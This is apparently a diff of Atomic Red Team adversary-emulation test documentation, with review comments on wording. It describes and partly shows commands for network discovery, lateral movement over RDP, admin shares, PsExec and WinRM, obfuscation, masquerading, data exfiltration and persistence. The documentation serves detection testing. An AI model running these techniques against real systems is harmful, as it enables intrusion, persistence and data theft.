@@ -150,15 +158,17 @@ for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
<br/>
## Atomic Test #5 - Remote System Discovery - arp
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -178,15 +188,17 @@ arp -a
<br/>
## Atomic Test #6 - Remote System Discovery - arp nix
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -218,15 +230,17 @@ echo "Install arp on the machine."; exit 1;
<br/>
## Atomic Test #7 - Remote System Discovery - sweep
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
#### Inputs:
@@ -253,15 +267,17 @@ for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -e
<br/>
## Atomic Test #8 - Remote System Discovery - nslookup
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -286,15 +302,17 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
<br/>
## Atomic Test #9 - Remote System Discovery - adidnsdump
auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.
**Supported Platforms:** Windows
**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
#### Inputs:
@@ -351,14 +369,16 @@ pip3 install adidnsdump
<br/>
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
#### Inputs:
@@ -395,14 +415,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
#### Inputs:
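Review bot: the "reference-" line in this hunk (and the identical one in Atomic Test #10 above) is neither a sentence nor a Markdown link; "Active directory" is also capitalised inconsistently with "Active Directory Domain Controller Objects" on the same line. Suggest "References: [joeware AdFind](http://www.joeware.net/freetools/tools/adfind/), [FireEye: Pick-Six](https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html)" and "Active Directory" throughout, applied in the YAML source of both tests.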
+5 -3
View File
@@ -12,15 +12,17 @@ When automated exfiltration is used, other exfiltration techniques likely apply
<br/>
## Atomic Test #1 - IcedID Botnet HTTP PUT
auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
Creates a text file
Tries to upload to a server via HTTP PUT method with ContentType Header
Deletes a created file
**Supported Platforms:** Windows
**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
#### Inputs:
+10 -6
View File
@@ -16,13 +16,15 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the
<br/>
## Atomic Test #1 - RDP to DomainController
auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
Attempt an RDP session via Remote Desktop Application to a DomainController.
**Supported Platforms:** Windows
**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
#### Inputs:
@@ -72,13 +74,15 @@ Write-Host Joining this computer to a domain must be done manually
<br/>
## Atomic Test #2 - RDP to Server
auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b
Attempt an RDP session via Remote Desktop Application over Powershell
**Supported Platforms:** Windows
**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b
#### Inputs:
+20 -12
View File
@@ -20,13 +20,15 @@ Windows systems have hidden network shares that are accessible only to administr
<br/>
## Atomic Test #1 - Map admin share
auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3
Connecting To Remote Shares
**Supported Platforms:** Windows
**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
#### Inputs:
@@ -54,13 +56,15 @@ cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}
<br/>
## Atomic Test #2 - Map Admin Share PowerShell
auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5
Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
#### Inputs:
@@ -87,13 +91,15 @@ New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{
<br/>
## Atomic Test #3 - Copy and Execute File with PsExec
auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
**Supported Platforms:** Windows
**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
#### Inputs:
@@ -135,14 +141,16 @@ Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
<br/>
## Atomic Test #4 - Execute command writing output to local Admin Share
auto_generated_guid: d41aaab5-bdfe-431d-a3d5-c29e9136ff46
Executes a command, writing the output to a local Admin Share.
This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
#### Inputs:
+5 -3
View File
@@ -16,9 +16,6 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
<br/>
## Atomic Test #1 - PowerShell Lateral Movement using MMC20
auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
Powershell lateral movement using the mmc20 application com object.
Reference:
@@ -26,9 +23,14 @@ Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
#### Inputs:
+15 -9
View File
@@ -16,15 +16,17 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
<br/>
## Atomic Test #1 - Enable Windows Remote Management
auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf
Powershell Enable WinRM
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
@@ -44,15 +46,17 @@ Enable-PSRemoting -Force
<br/>
## Atomic Test #2 - Invoke-Command
auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
Execute Invoke-command on remote host.
Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
**Supported Platforms:** Windows
**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
#### Inputs:
@@ -78,13 +82,15 @@ invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
<br/>
## Atomic Test #3 - WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
**Supported Platforms:** Windows
**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
#### Inputs:
+5 -3
View File
@@ -12,15 +12,17 @@ Binary padding effectively changes the checksum of the file and can also be used
<br/>
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a
Uses dd to add a zero to the binary to change the hash.
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
#### Inputs:
+20 -12
View File
@@ -18,14 +18,16 @@ Utilities used to perform software packing are called packers. Example packers a
<br/>
## Atomic Test #1 - Binary simply packed by UPX (linux)
auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** Linux
**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
#### Inputs:
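Review bot: "No other protection/compression were applied." should be "was applied" (singular subject); the same sentence recurs in Atomic Test #3 below, so correct both in the YAML source.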
@@ -54,16 +56,18 @@ rm /tmp/packed_bin
<br/>
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux)
auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** Linux
**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
#### Inputs:
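Review bot: "and especially UPX is not able to uncompress it any more" is awkward; suggest "in particular, `upx -d` can no longer unpack it". The magic values quoted are consistent (`0x55505821` is the ASCII bytes of `UPX!` and `0x4c4f5452` of `LOTR`), so only the wording needs the change. The identical sentence appears in Atomic Test #4 below.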
@@ -92,14 +96,16 @@ rm /tmp/packed_bin
<br/>
## Atomic Test #3 - Binary simply packed by UPX
auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** macOS
**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
#### Inputs:
@@ -128,16 +134,18 @@ rm /tmp/packed_bin
<br/>
## Atomic Test #4 - Binary packed by UPX, with modified headers
auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** macOS
**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
#### Inputs:
+10 -6
View File
@@ -14,14 +14,16 @@ Source code payloads may also be encrypted, encoded, and/or embedded within othe
<br/>
## Atomic Test #1 - Compile After Delivery using csc.exe
auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206
Compile C# code using csc.exe binary used by .NET
Upon execution an exe named T1027.004.exe will be placed in the temp folder
**Supported Platforms:** Windows
**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
#### Inputs:
@@ -64,16 +66,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - Dynamic C# Compile
auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.
The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.
Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
**Supported Platforms:** Windows
**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
#### Inputs:
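Review bot: "is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder" runs two clauses together and misspells "contained". Suggest: "The executable that will run, T1027.004_DynamicCompile.exe, is in this atomic's 'bin' folder; its source code is in the 'src' folder." Fix in the YAML description, not here.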
+30 -18
View File
@@ -26,15 +26,17 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
<br/>
## Atomic Test #1 - Decode base64 Data into Script
auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb
Creates a base64-encoded data file and decodes it into an executable shell script
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
@@ -57,15 +59,17 @@ chmod +x /tmp/art.sh
<br/>
## Atomic Test #2 - Execute base64-encoded PowerShell
auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
**Supported Platforms:** Windows
**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
#### Inputs:
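Review bot: the quoting in 'stdout default is "Write-Host "Hey, Atomic!"' is unbalanced and nests double quotes inside double quotes. Suggest: 'stdout default is `Write-Host "Hey, Atomic!"`' so the command renders as code and the inner quotes stay intact.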
@@ -94,15 +98,17 @@ powershell.exe -EncodedCommand $EncodedCommand
<br/>
## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry
auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.
Upon successful execution, powershell will execute encoded command and read/write from the registry.
**Supported Platforms:** Windows
**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
#### Inputs:
@@ -139,13 +145,15 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
<br/>
## Atomic Test #4 - Execution from Compressed File
auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
**Supported Platforms:** Windows
**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
#### Inputs:
@@ -190,14 +198,16 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
<br/>
## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email
auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
**Supported Platforms:** Windows
**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
#### Inputs:
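Review bot: "Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check" doubles its hedges ("about", "around", "odd") and has a number-agreement error. Suggest: "The sensitive data consists of roughly 20 simulated credit card numbers that pass the Luhn check." Likewise "an excel containing VBA Macro containing sensitive data" reads better as "an Excel workbook whose VBA macro contains sensitive data". The same two sentences recur in Atomic Test #6 below; fix both in the YAML source.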
@@ -225,14 +235,16 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -A
<br/>
## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP
auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
**Supported Platforms:** Windows
**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
#### Inputs:
+5 -3
View File
@@ -10,13 +10,15 @@
<br/>
## Atomic Test #1 - Data Transfer Size Limits
auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
#### Inputs:
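Review bot: "split it into 5Mb chunks" uses the abbreviation for megabits; if the underlying split command works in bytes (the command is not visible in this hunk, so verify against the atomic's `command` field), the description should say "5 MB" so the expected chunk size is unambiguous.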
+15 -9
View File
@@ -16,16 +16,18 @@ Utilities and commands that acquire this information include <code>whoami</code>
<br/>
## Atomic Test #1 - System Owner/User Discovery
auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa
Identify System owner or users on an endpoint.
Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout.
Additionally, two files will be written to disk - computers.txt and usernames.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
#### Inputs:
@@ -57,15 +59,17 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
<br/>
## Atomic Test #2 - System Owner/User Discovery
auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c
Identify System owner or users on an endpoint
Upon successful execution, sh will stdout list of usernames.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
@@ -87,13 +91,15 @@ who
<br/>
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)
auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca
Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
+45 -27
View File
@@ -26,15 +26,17 @@
<br/>
## Atomic Test #1 - Masquerading as Windows LSASS process
auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session
**Supported Platforms:** Windows
**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
@@ -59,15 +61,17 @@ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
<br/>
## Atomic Test #2 - Masquerading as Linux crond process.
auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
Upon successful execution, sh is renamed to `crond` and executed.
**Supported Platforms:** Linux
**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
@@ -92,15 +96,17 @@ rm /tmp/crond
<br/>
## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe
auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0
Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe.
Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -125,15 +131,17 @@ del /Q /F %APPDATA%\notepad.exe >nul 2>&1
<br/>
## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe
auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder
**Supported Platforms:** Windows
**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
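Review bot: "wscript will have been renamed to svchost and ran out of the temp folder" should read "run from the temp folder" (past participle after "have been", and "out of" is colloquial here). Fix in the YAML description.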
@@ -158,15 +166,17 @@ del /Q /F %APPDATA%\svchost.exe >nul 2>&1
<br/>
## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe
auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
@@ -191,15 +201,17 @@ del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
<br/>
## Atomic Test #6 - Masquerading - non-windows exe running as windows exe
auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086
Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
Upon successful execution, powershell will execute T1036.003.exe as svchost.exe from on a non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
#### Inputs:
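Review bot: "executed T1027.004.exe as svchost.exe from on a non-standard path" has a doubled preposition; suggest "from a non-standard path". Fix in the YAML description.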
@@ -244,13 +256,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #7 - Masquerading - windows exe running as different windows exe
auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0
Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe
**Supported Platforms:** Windows
**auto_generated_guid:** c3d24a39-2bfe-4c6a-b064-90cd73896cb0
#### Inputs:
@@ -282,16 +296,18 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
<br/>
## Atomic Test #8 - Malicious process Masquerading as LSM.exe
auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
Detect LSM running from an incorrect directory and an incorrect service account
This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder.
Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from non-standard path.
**Supported Platforms:** Windows
**auto_generated_guid:** 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
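Review bot: the opening line "Detect LSM running from an incorrect directory and an incorrect service account" states a detection goal rather than what the test does, which the next two sentences describe (copy cmd.exe to lsm.exe and run it from C:\). Suggest rewording it as "Simulates a malicious process masquerading as lsm.exe so that detections for LSM running from an incorrect directory or service account can be validated", and make "copying a file to the C:\ folder" specific ("copying it to C:\lsm.exe", which matches the cleanup in the hunk header). Fix in the YAML description.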
@@ -317,15 +333,17 @@ del C:\lsm.exe >nul 2>&1
<br/>
## Atomic Test #9 - File Extension Masquerading
auto_generated_guid: c7fa0c3b-b57f-4cba-9118-863bf4e653fc
download and execute a file masquerading as images or Office files. Upon execution 3 calc instances and 3 vbs windows will be launched.
e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc] (Quartelyreport.docx.exe)
**Supported Platforms:** Windows
**auto_generated_guid:** c7fa0c3b-b57f-4cba-9118-863bf4e653fc
#### Inputs:
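Review bot: the description starts lowercase ("download and execute"), "e.g" lacks its period, and the example filename "Quartelyreport.docx.exe" misspells "Quarterly". Suggest: "Download and execute files masquerading as images or Office documents, e.g. SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,...].[exe,vbs,js,ps1,...] (Quarterlyreport.docx.exe). Upon execution, 3 calc instances and 3 VBS windows will be launched." Fix in the YAML source.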
+10 -6
View File
@@ -14,13 +14,15 @@ Tasks or services contain other fields, such as a description, that adversaries
<br/>
## Atomic Test #1 - Creating W32Time similar named service using schtasks
auto_generated_guid: f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
Creating W32Time similar named service (win32times) using schtasks just like threat actor dubbed "Operation Wocao"
**Supported Platforms:** Windows
**auto_generated_guid:** f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
@@ -45,13 +47,15 @@ schtasks /tn win32times /delete /f
<br/>
## Atomic Test #2 - Creating W32Time similar named service using sc
auto_generated_guid: b721c6ef-472c-4263-a0d9-37f1f4ecff66
Creating W32Time similar named service (win32times) using sc just like threat actor dubbed "Operation Wocao"
**Supported Platforms:** Windows
**auto_generated_guid:** b721c6ef-472c-4263-a0d9-37f1f4ecff66
+5 -3
View File
@@ -12,13 +12,15 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
<br/>
## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
#### Inputs:
+5 -3
View File
@@ -14,13 +14,15 @@ Adversaries can use this feature to trick users into double clicking benign-look
<br/>
## Atomic Test #1 - Space After Filename
auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f
Space After Filename
**Supported Platforms:** macOS
**auto_generated_guid:** 89a7dd26-e510-4c9f-9b15-f3bae333360f
#### Run it with these steps!
+5 -3
View File
@@ -12,13 +12,15 @@ Renaming abusable system utilities to evade security monitoring is also a form o
<br/>
## Atomic Test #1 - System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
**Supported Platforms:** Windows
**auto_generated_guid:** 51005ac7-52e2-45e0-bdab-d17c6d4916cd
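Review bot: "It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory" describes the detection rationale but never says what the test does; the description should lead with the action (which executable is copied and where it is executed from), with the suspicion note as a second sentence. Fix in the YAML description.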
+5 -3
View File
@@ -12,14 +12,16 @@ Adversaries may use these scripts to maintain persistence on a single system. De
<br/>
## Atomic Test #1 - Logon Scripts
auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
that can be viewed in the Registry Editor.
**Supported Platforms:** Windows
**auto_generated_guid:** d6042746-07d4-4c92-9ad8-e644c114a231
#### Inputs:
+5 -3
View File
@@ -12,13 +12,15 @@ Adversaries may use these login hooks to maintain persistence on a single system
<br/>
## Atomic Test #1 - Logon Scripts - Mac
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
Mac logon script
**Supported Platforms:** macOS
**auto_generated_guid:** f047c7de-a2d9-406e-a62b-12a09d9516f4
#### Run it with these steps!
+15 -9
View File
@@ -20,15 +20,17 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
<br/>
## Atomic Test #1 - rc.common
auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de
Modify rc.common
[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
**Supported Platforms:** macOS
**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
@@ -48,13 +50,15 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
<br/>
## Atomic Test #2 - rc.common
auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
Modify rc.common
**Supported Platforms:** Linux
**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
@@ -82,13 +86,15 @@ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /e
<br/>
## Atomic Test #3 - rc.local
auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
Modify rc.local
**Supported Platforms:** Linux
**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
+5 -3
View File
@@ -14,15 +14,17 @@ An adversary can create the appropriate folders/files in the StartupItems direct
<br/>
## Atomic Test #1 - Add file to Local Library StartupItems
auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198
Modify or create an file in /Library/StartupItems
[Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
**Supported Platforms:** macOS
**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
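Review bot: "Modify or create an file in /Library/StartupItems" should be "a file". Fix in the YAML description.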
+20 -12
View File
@@ -20,15 +20,17 @@ Network sniffing may also reveal configuration details, such as running services
<br/>
## Atomic Test #1 - Packet Capture Linux
auto_generated_guid: 7fe741f7-b265-4951-a7c7-320889083b3e
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
**Supported Platforms:** Linux
**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
#### Inputs:
@@ -66,15 +68,17 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
<br/>
## Atomic Test #2 - Packet Capture macOS
auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
**Supported Platforms:** macOS
**auto_generated_guid:** 9d04efee-eff5-4240-b8d2-07792b873608
#### Inputs:
